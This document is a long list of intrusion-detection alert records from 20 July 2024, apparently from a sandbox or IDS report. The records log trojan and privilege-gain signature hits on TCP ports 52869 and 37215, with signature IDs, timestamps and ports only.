                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.531304
                      SID:2027339
                      Source Port:40316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.145992
                      SID:2835222
                      Source Port:47668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.485640
                      SID:2027339
                      Source Port:55748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.318882
                      SID:2027339
                      Source Port:38064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.540965
                      SID:2027339
                      Source Port:53790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.692241
                      SID:2025132
                      Source Port:53950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.515632
                      SID:2027339
                      Source Port:57926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:41.550251
                      SID:2027339
                      Source Port:45536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.977626
                      SID:2025132
                      Source Port:44902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.392392
                      SID:2027339
                      Source Port:47506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.839035
                      SID:2025132
                      Source Port:47874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.589156
                      SID:2831300
                      Source Port:35800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.817171
                      SID:2027339
                      Source Port:33822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.635095
                      SID:2025132
                      Source Port:49064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.600216
                      SID:2835222
                      Source Port:37772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.123864
                      SID:2831300
                      Source Port:38874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.009637
                      SID:2025132
                      Source Port:45816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.244494
                      SID:2025132
                      Source Port:41488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:40.767884
                      SID:2831300
                      Source Port:51510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.354528
                      SID:2025132
                      Source Port:52020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.384426
                      SID:2025132
                      Source Port:52548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:55.227510
                      SID:2831300
                      Source Port:34704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.139331
                      SID:2025132
                      Source Port:36122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.113321
                      SID:2829579
                      Source Port:48724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.205029
                      SID:2027339
                      Source Port:34768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.153869
                      SID:2831300
                      Source Port:37802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.612114
                      SID:2027339
                      Source Port:33778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323623
                      SID:2835222
                      Source Port:56294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.068340
                      SID:2025132
                      Source Port:47116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.507639
                      SID:2027339
                      Source Port:41800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.532921
                      SID:2835222
                      Source Port:40020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.058256
                      SID:2835222
                      Source Port:44548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.404370
                      SID:2027339
                      Source Port:56634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2829579
                      Source Port:34374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.318185
                      SID:2025132
                      Source Port:47574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.949518
                      SID:2025132
                      Source Port:41090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.486069
                      SID:2831300
                      Source Port:40384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.518359
                      SID:2831300
                      Source Port:39294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.355668
                      SID:2025132
                      Source Port:55890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.489725
                      SID:2027339
                      Source Port:58876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2829579
                      Source Port:48334
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:45.487764
                      SID:2027339
                      Source Port:54820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2835222
                      Source Port:53390
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.447173
                      SID:2835222
                      Source Port:33824
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.318185
                      SID:2831300
                      Source Port:55088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.314673
                      SID:2831300
                      Source Port:34160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2835222
                      Source Port:45368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.513130
                      SID:2027339
                      Source Port:36280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:48.642445
                      SID:2025132
                      Source Port:40836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.017303
                      SID:2027339
                      Source Port:51846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.734892
                      SID:2831300
                      Source Port:38668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.163232
                      SID:2831300
                      Source Port:57570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2829579
                      Source Port:57584
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.099074
                      SID:2025132
                      Source Port:59138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.445837
                      SID:2025132
                      Source Port:59990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.383849
                      SID:2829579
                      Source Port:35316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.515352
                      SID:2835222
                      Source Port:49778
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.551205
                      SID:2831300
                      Source Port:46816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.653975
                      SID:2025132
                      Source Port:38208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.549791
                      SID:2027339
                      Source Port:52340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.797060
                      SID:2027339
                      Source Port:35346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.955037
                      SID:2831300
                      Source Port:38392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2829579
                      Source Port:55064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.132424
                      SID:2027339
                      Source Port:49380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2835222
                      Source Port:58584
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.002874
                      SID:2027339
                      Source Port:45604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.324702
                      SID:2027339
                      Source Port:51322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.134564
                      SID:2829579
                      Source Port:60672
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.515632
                      SID:2831300
                      Source Port:58938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.864699
                      SID:2027339
                      Source Port:56854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.662240
                      SID:2027339
                      Source Port:57172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.066021
                      SID:2025132
                      Source Port:55762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.365818
                      SID:2027339
                      Source Port:57624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.853915
                      SID:2027339
                      Source Port:44594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.354369
                      SID:2027339
                      Source Port:54188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327719
                      SID:2829579
                      Source Port:52330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.468494
                      SID:2027339
                      Source Port:43858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.745087
                      SID:2027339
                      Source Port:60526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.623995
                      SID:2027339
                      Source Port:35642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2835222
                      Source Port:60046
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:41.550251
                      SID:2831300
                      Source Port:52870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.456840
                      SID:2831300
                      Source Port:59462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.967879
                      SID:2027339
                      Source Port:38504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.771024
                      SID:2027339
                      Source Port:48184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.422821
                      SID:2027339
                      Source Port:45576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.467103
                      SID:2025132
                      Source Port:50918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.958012
                      SID:2025132
                      Source Port:57782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.911568
                      SID:2027339
                      Source Port:59022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.027910
                      SID:2025132
                      Source Port:53256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.756250
                      SID:2025132
                      Source Port:56612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.320378
                      SID:2025132
                      Source Port:44732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.821008
                      SID:2835222
                      Source Port:45282
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.325373
                      SID:2027339
                      Source Port:43658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.323671
                      SID:2831300
                      Source Port:35554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.860838
                      SID:2835222
                      Source Port:33640
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.334659
                      SID:2027339
                      Source Port:56232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.685214
                      SID:2829579
                      Source Port:52332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.325934
                      SID:2027339
                      Source Port:37940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.526908
                      SID:2829579
                      Source Port:40708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2829579
                      Source Port:55276
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.553922
                      SID:2027339
                      Source Port:50118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.993749
                      SID:2835222
                      Source Port:40078
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.055908
                      SID:2835222
                      Source Port:47724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.122085
                      SID:2027339
                      Source Port:56598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.590968
                      SID:2027339
                      Source Port:55692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.447263
                      SID:2027339
                      Source Port:55470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.290090
                      SID:2027339
                      Source Port:33826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2829579
                      Source Port:43180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2829579
                      Source Port:56398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.971654
                      SID:2829579
                      Source Port:37178
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.735784
                      SID:2025132
                      Source Port:57692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.449068
                      SID:2027339
                      Source Port:43414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.535822
                      SID:2027339
                      Source Port:37210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.659618
                      SID:2835222
                      Source Port:47408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.139544
                      SID:2027339
                      Source Port:49740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.445659
                      SID:2027339
                      Source Port:32996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.369944
                      SID:2027339
                      Source Port:39810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.233115
                      SID:2027339
                      Source Port:55078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.577316
                      SID:2829579
                      Source Port:34142
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.828884
                      SID:2829579
                      Source Port:37594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.560327
                      SID:2027339
                      Source Port:49242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.531304
                      SID:2831300
                      Source Port:39990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.409134
                      SID:2829579
                      Source Port:60790
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.790631
                      SID:2027339
                      Source Port:36502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.031215
                      SID:2831300
                      Source Port:37284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:03.257276
                      SID:2027339
                      Source Port:34104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.476343
                      SID:2027339
                      Source Port:49720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.938217
                      SID:2831300
                      Source Port:37276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2829579
                      Source Port:37518
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2835222
                      Source Port:56896
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.018219
                      SID:2831300
                      Source Port:53574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.435097
                      SID:2829579
                      Source Port:39260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.983284
                      SID:2831300
                      Source Port:42526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.014309
                      SID:2831300
                      Source Port:39742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.076249
                      SID:2831300
                      Source Port:53822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.048997
                      SID:2829579
                      Source Port:45080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.209942
                      SID:2027339
                      Source Port:54582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2835222
                      Source Port:34852
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.487251
                      SID:2831300
                      Source Port:37940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.460569
                      SID:2829579
                      Source Port:51274
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.066947
                      SID:2835222
                      Source Port:58042
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.648285
                      SID:2027339
                      Source Port:49312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.783693
                      SID:2829579
                      Source Port:54626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2829579
                      Source Port:52298
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.672606
                      SID:2025132
                      Source Port:46856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.663319
                      SID:2027339
                      Source Port:35264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2835222
                      Source Port:59856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.469321
                      SID:2027339
                      Source Port:36992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.401351
                      SID:2027339
                      Source Port:33218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.832966
                      SID:2027339
                      Source Port:56580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.332948
                      SID:2027339
                      Source Port:53152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.808887
                      SID:2835222
                      Source Port:60540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.516920
                      SID:2027339
                      Source Port:56756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.996850
                      SID:2027339
                      Source Port:36260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.106479
                      SID:2027339
                      Source Port:55632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.328640
                      SID:2829579
                      Source Port:43506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.759654
                      SID:2025132
                      Source Port:49420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.017539
                      SID:2831300
                      Source Port:55024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.181822
                      SID:2027339
                      Source Port:34386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830838
                      SID:2835222
                      Source Port:36520
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.439167
                      SID:2835222
                      Source Port:44408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.462705
                      SID:2831300
                      Source Port:54692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:04.575032
                      SID:2027339
                      Source Port:55228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.725561
                      SID:2025132
                      Source Port:58864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2835222
                      Source Port:39738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.509551
                      SID:2027339
                      Source Port:37036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.143883
                      SID:2831300
                      Source Port:36064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.578706
                      SID:2027339
                      Source Port:33706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.400252
                      SID:2027339
                      Source Port:55988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.609835
                      SID:2027339
                      Source Port:34782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.361541
                      SID:2027339
                      Source Port:58066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.997543
                      SID:2027339
                      Source Port:45906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.925501
                      SID:2025132
                      Source Port:39662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.648426
                      SID:2835222
                      Source Port:51144
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.473003
                      SID:2025132
                      Source Port:51504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.496382
                      SID:2831300
                      Source Port:35188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.891482
                      SID:2025132
                      Source Port:47532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.383835
                      SID:2027339
                      Source Port:59804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.559359
                      SID:2835222
                      Source Port:43180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.055908
                      SID:2829579
                      Source Port:35654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
